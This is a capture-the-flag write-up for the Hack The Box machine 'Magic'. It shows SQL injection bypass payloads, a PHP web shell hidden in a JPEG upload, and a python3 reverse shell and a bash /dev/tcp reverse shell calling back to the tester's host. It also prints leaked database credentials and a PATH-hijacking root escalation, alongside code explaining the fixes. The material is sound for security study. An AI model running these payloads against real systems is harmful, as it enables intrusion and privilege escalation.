
Magic Writeup [HTB]

Magic is a Linux machine rated medium on Hack The Box. The path to root is a SQL injection login bypass, an arbitrary file upload that gets a PHP web shell executed, credential reuse to move to a local user, and finally a PATH hijacking attack against a SUID binary.

Enumeration

Running nmap:

nmap -sC -sV -o nmap.txt 10.10.10.185
Nmap scan report for 10.10.10.185
Host is up (0.035s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Browsing to port 80 we find the Magic Portfolio page.

There is a login form that can be bypassed with SQL injection: the username is concatenated into the query unescaped, so closing the quote and commenting out the rest of the WHERE clause logs us in without a password.
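To make the bypass concrete, here is an added example (not code from the box or the original post) that rebuilds a login check in the two ways it can be written. It assumes the form's query concatenates the username and password into a string the way shown in `login_vulnerable`; the table name `login` matches the dump later on, but the seeded credentials are placeholders. SQLite is used only because it ships with Python; the `-- -` comment trick works the same against MySQL.

```python
import sqlite3

# Constructed in-memory stand-in for the Magic `login` table.
# The credentials are placeholders, not the ones from the box.
SEED_USERS = [("admin", "correct-horse")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE login (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO login (username, password) VALUES (?, ?)", SEED_USERS
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # User input is pasted straight into the SQL text (assumed shape of the
    # box's query). Quotes and comment markers in the input become SQL.
    query = (
        "SELECT id FROM login WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Parameterised query: values travel separately from the SQL text, so the
    # same payload is compared literally against the username column.
    query = "SELECT id FROM login WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


# Closes the username string and comments out the password check:
#   ... WHERE username = 'admin'-- -' AND password = '...'
BYPASS_KNOWN_USER = "admin'-- -"
# Same idea without knowing a username; matches every row, first one wins.
BYPASS_ANY_USER = "' OR 1=1-- -"


def demo() -> dict:
    conn = make_db()
    return {
        "vuln_bypassed_known_user": login_vulnerable(conn, BYPASS_KNOWN_USER, "x"),
        "vuln_bypassed_any_user": login_vulnerable(conn, BYPASS_ANY_USER, "x"),
        "vuln_wrong_password": login_vulnerable(conn, "admin", "wrong"),
        "safe_bypassed": login_safe(conn, BYPASS_KNOWN_USER, "x"),
        "safe_valid_login": login_safe(conn, "admin", "correct-horse"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The vulnerable version lets either payload in while still rejecting a plain wrong password, which is why the form looks fine under normal testing. The parameterised version treats `admin'-- -` as a username that does not exist. A real application should also compare a password hash rather than the clear-text value stored here.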

Once logged in, there is an image upload utility.

Exploitation

We will use exiftool to embed a PHP web shell inside a JPEG image; the Comment tag is written as a JPEG COM segment, so the file still has valid image headers:

exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' minion.jpg

Note the double quotes around cmd: with `$_GET['cmd']` the inner single quotes would end the shell's quoted string and bash would strip them, leaving `$_GET[cmd]` in the file, which PHP 7 only tolerates with a notice.

Then we rename the image to minion.php.jpg and upload it. The upload check is satisfied because the name ends in .jpg and the content starts with JPEG magic bytes, but Apache still hands the file to the PHP interpreter because of the .php in the name. The web shell is reachable at http://10.10.10.185/images/uploads/minion.php.jpg?cmd=

Now we can obtain a shell using a python3 reverse shell. The command goes in the cmd parameter; a browser URL-encodes the spaces and quotes for us, while with curl the equivalent is `curl -G --data-urlencode 'cmd=...' URL`:
http://10.10.10.185/images/uploads/minion.php.jpg?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.116",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

And we get a reverse connection as www-data:

nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.116] from (UNKNOWN) [10.10.10.185] 47460
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

Now we can upgrade the shell to an interactive shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo
fg
export TERM=xterm

Database credentials for the Magic database are hard-coded in /var/www/Magic/db.php5:

www-data@ubuntu:/var/www/Magic$ cat db.php5
<?php
class Database
{
    private static $dbName = 'Magic' ;
    private static $dbHost = 'localhost' ;
    private static $dbUsername = 'theseus';
    private static $dbUserPassword = 'iamkingtheseus';

With those credentials we can dump the database using mysqldump; the relevant row is the one from the login table:

mysqldump -B Magic -u theseus -p
Enter password:
-- MySQL dump 10.13  Distrib 5.7.29, for Linux (x86_64)
-- Host: localhost    Database: Magic
-- Server version       5.7.29-0ubuntu0.18.04.1
-- Dumping data for table `login`
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');

The admin password from the web application is reused for the local user theseus:

www-data@ubuntu:/var/www/Magic$ su theseus
Password:
theseus@ubuntu:/var/www/Magic$

For a more stable shell, we can copy our public key into /home/theseus/.ssh/authorized_keys and log in over SSH with the matching private key:
ssh theseus@10.10.10.185 -i id_rsa

Privilege escalation

Searching for SUID binaries, a non-standard one, /bin/sysinfo, stands out:
theseus@ubuntu:~$ find / -perm -u=s -type f 2>/dev/null
/bin/sysinfo

Running strings on it shows that it calls several helper programs (lshw, fdisk, cat) by bare name rather than by absolute path. A SUID binary inherits the caller's PATH, so whichever lshw, fdisk or cat appears first in that PATH is executed with root privileges; this is a classic PATH hijacking vulnerability:

theseus@ubuntu:~$ strings /bin/sysinfo
====================Hardware Info====================
lshw -short
====================Disk Info====================
fdisk -l
====================CPU Info====================
cat /proc/cpuinfo
====================MEM Usage=====================

We will create a malicious fdisk script in /tmp containing a bash reverse shell, make it executable, and prepend /tmp to PATH so it is found before /sbin/fdisk:

theseus@ubuntu:~$ cd /tmp
theseus@ubuntu:/tmp$ nano fdisk
theseus@ubuntu:/tmp$ cat fdisk
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.116/1234 0>&1
theseus@ubuntu:/tmp$ chmod +x fdisk
theseus@ubuntu:/tmp$ export PATH=/tmp:$PATH

Finally, with a listener waiting on port 1234, running sysinfo again executes our fdisk as root and gives back a root reverse shell. (If the shell came back as theseus instead, the SUID binary would only have raised the effective UID and bash would have dropped it; `bash -p` in the script keeps it.)

nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.116] from (UNKNOWN) [10.10.10.185] 43596
root@ubuntu:/tmp# whoami
whoami
root
root@ubuntu:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root),100(users),1000(theseus)
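
To show why the bare `fdisk -l` inside sysinfo is enough, here is an added example (not code from the box or the original post) that reproduces the hijack against a stand-in for sysinfo and then shows the fix. It plants a fake fdisk in a temporary directory instead of /tmp, prepends that directory to PATH exactly as above, and compares a "sysinfo" that runs the command by name under the inherited environment with one that discards the caller's PATH and resolves the binary against a fixed trusted list. The `TRUSTED_PATH` value and the names of the helper functions are my assumptions; nothing here needs root.

```python
import os
import stat
import subprocess
import tempfile

# Directories a privileged program should be willing to search (assumed list).
TRUSTED_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"


def resolve(command: str, path_env: str):
    """First executable called `command` along path_env, the way a shell picks it."""
    for directory in path_env.split(":"):
        if not directory:
            continue
        candidate = os.path.join(directory, command)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def plant_fake(writable_dir: str, command: str, marker: str) -> str:
    """Attacker step: a script named after the hijacked command in a writable dir.

    On the box this is /tmp/fdisk with a reverse shell; here it just prints a
    marker so the outcome can be checked.
    """
    path = os.path.join(writable_dir, command)
    with open(path, "w") as f:
        f.write(f"#!/bin/sh\necho {marker}\n")
    os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    return path


def sysinfo_vulnerable(env: dict) -> str:
    """Stand-in for /bin/sysinfo: runs the command by bare name under the caller's env,
    which is what a system()/popen("fdisk -l") call in a SUID binary does."""
    proc = subprocess.run("fdisk -l", shell=True, env=env, capture_output=True, text=True)
    return proc.stdout


def sysinfo_hardened(env: dict) -> str:
    """Same job, but the inherited PATH is ignored: the binary is located in
    TRUSTED_PATH only and run with an absolute path and a minimal environment."""
    binary = resolve("fdisk", TRUSTED_PATH)
    if binary is None:
        return "fdisk not found in trusted PATH"
    proc = subprocess.run([binary, "-l"], env={"PATH": TRUSTED_PATH},
                          capture_output=True, text=True)
    return proc.stdout


def demo() -> dict:
    marker = "HIJACKED"
    with tempfile.TemporaryDirectory() as writable:
        fake = plant_fake(writable, "fdisk", marker)
        hijacked_env = {"PATH": writable + ":" + TRUSTED_PATH}  # export PATH=/tmp:$PATH
        return {
            "shell_would_pick_fake": resolve("fdisk", hijacked_env["PATH"]) == fake,
            "vulnerable_ran_fake": marker in sysinfo_vulnerable(hijacked_env),
            "hardened_ran_fake": marker in sysinfo_hardened(hijacked_env),
        }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The same resolution order is what makes `export PATH=/tmp:$PATH` work on the box. In the real binary the fix is to call helpers by absolute path (or reset PATH before any system()/popen call) and, better, not to make a reporting tool SUID at all. If the temporary directory is on a filesystem mounted noexec, the fake script cannot run and the vulnerable case will not show the marker.
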

This post is licensed under CC BY 4.0 by the author.